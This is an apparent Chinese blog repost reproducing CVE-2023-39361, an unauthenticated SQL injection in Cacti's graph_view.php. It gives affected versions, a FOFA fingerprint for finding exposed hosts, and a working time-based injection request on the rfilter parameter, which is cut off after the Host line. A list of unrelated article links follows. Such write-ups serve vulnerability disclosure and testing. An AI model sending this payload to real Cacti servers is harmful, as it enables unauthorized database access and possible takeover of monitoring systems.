当前位置: 首页 > news >正文

Cacti 前台SQL注入漏洞复现(CVE-2023-39361)

0x01 产品简介

Cacti 是一套基于 PHP,MySQL,SNMP 及 RRDTool 开发的网络流量监测图形分析工具。

0x02 漏洞概述

该漏洞存在于graph_view.php文件中。默认情况下,访客用户无需身份验证即可访问graph_view.php,在启用情况下使用时会导致SQL注入漏洞。

攻击者可能利用此漏洞执行远程代码或篡夺管理权限。Growth_right_pane_tree函数包含从graph_view.php文件调用的漏洞。在tree_content情况下,用户输入通过html_validate_tree_vars函数进行验证。如果tree_id参数大于0,则调用grow_right_pane_tree函数。

0x03 影响范围

Cacti <= 1.2.24

0x04 复现环境

FOFA:icon_hash="-1797138069"

0x05 漏洞复现

PoC

GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3d%22%28%28%22%29%29%3bselect+sleep%285%29%3b--+- HTTP/1.1
Host: your-ip
User

相关文章:

  • Unity中URP下的 额外灯 逐像素光 和 逐顶点光
  • props传值
  • 自然语言处理的崛起:从初步分析到深度理解
  • PLC从HTTP服务端获取JSON文件,解析数据到寄存器
  • Linux编辑器---vim
  • 2.2.1.1-一个关于定投的故(姿)事(势)
  • CloudPanel RCE漏洞复现(CVE-2023-35885)
  • 探索设计模式的魅力:一次设计,多次利用,深入理解原型模式的设计艺术
  • EasyExcelFactory 导入导出功能的实战使用
  • 《数据结构》第七章:树和森林
  • 解开缺省参数与函数重载的衣裳
  • 超过GPT3.5?Mixtral 8*7B 模型结构分析
  • 开源项目_大模型应用_Chat2DB
  • krpano制作无水印360°场景方法
  • JavaScript库jquery的使用方法
  • [nginx文档翻译系列] 控制nginx
  • 《Javascript数据结构和算法》笔记-「字典和散列表」
  • C++11: atomic 头文件
  • Java Agent 学习笔记
  • Java多线程(4):使用线程池执行定时任务
  • Java新版本的开发已正式进入轨道,版本号18.3
  • rc-form之最单纯情况
  • 诡异!React stopPropagation失灵
  • 前端
  • 前端js -- this指向总结。
  • 前端路由实现-history
  • 手写一个CommonJS打包工具(一)
  • 微信公众号开发小记——5.python微信红包
  • 新书推荐|Windows黑客编程技术详解
  • 好程序员大数据教程Hadoop全分布安装(非HA)
  • ​Kaggle X光肺炎检测比赛第二名方案解析 | CVPR 2020 Workshop
  • ​水经微图Web1.5.0版即将上线
  • ###STL(标准模板库)
  • #QT(串口助手-界面)
  • #ubuntu# #git# repository git config --global --add safe.directory
  • #我与Java虚拟机的故事#连载04:一本让自己没面子的书
  • #我与Java虚拟机的故事#连载10: 如何在阿里、腾讯、百度、及字节跳动等公司面试中脱颖而出...
  • #我与虚拟机的故事#连载20:周志明虚拟机第 3 版:到底值不值得买?
  • (二)fiber的基本认识
  • (二)构建dubbo分布式平台-平台功能导图
  • (附源码)springboot家庭装修管理系统 毕业设计 613205
  • (转)程序员技术练级攻略
  • (转载)深入super,看Python如何解决钻石继承难题
  • .md即markdown文件的基本常用编写语法
  • .NET : 在VS2008中计算代码度量值
  • .net framework4与其client profile版本的区别
  • .NET Micro Framework 4.2 beta 源码探析
  • .NET/C# 判断某个类是否是泛型类型或泛型接口的子类型
  • .NET设计模式(8):适配器模式(Adapter Pattern)
  • .pings勒索病毒的威胁:如何应对.pings勒索病毒的突袭?
  • [ C++ ] template 模板进阶 (特化,分离编译)
  • [ 英语 ] 马斯克抱水槽“入主”推特总部中那句 Let that sink in 到底是什么梗?
  • [2016.7.test1] T2 偷天换日 [codevs 1163 访问艺术馆(类似)]
  • [android]-如何在向服务器发送request时附加已保存的cookie数据
  • [Android开源]EasySharedPreferences:优雅的进行SharedPreferences数据存储操作